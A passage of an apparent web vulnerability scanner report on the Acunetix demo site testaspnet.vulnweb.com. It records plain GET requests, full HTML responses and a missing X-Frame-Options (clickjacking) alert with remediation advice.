//<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter X-Frame-OptionsSolution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
GET http://testaspnet.vulnweb.com/
Alert tags Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request Request line and header section (212 bytes)
GET http://testaspnet.vulnweb.com/ HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cacheRequest body (0 bytes)
Response Status line and header section (296 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=zs3o22mcjjooor3kztmjgeey; path=/; HttpOnly X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:15 GMT Content-Length: 13912Response body (13912 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter X-Frame-OptionsSolution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
GET http://testaspnet.vulnweb.com/about.aspx
Alert tags Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request Request line and header section (314 bytes)
GET http://testaspnet.vulnweb.com/about.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:17 GMT Content-Length: 14467Response body (14467 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>About</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="about.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/2grLtTL+jO092JULZB++ks9UGJw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: 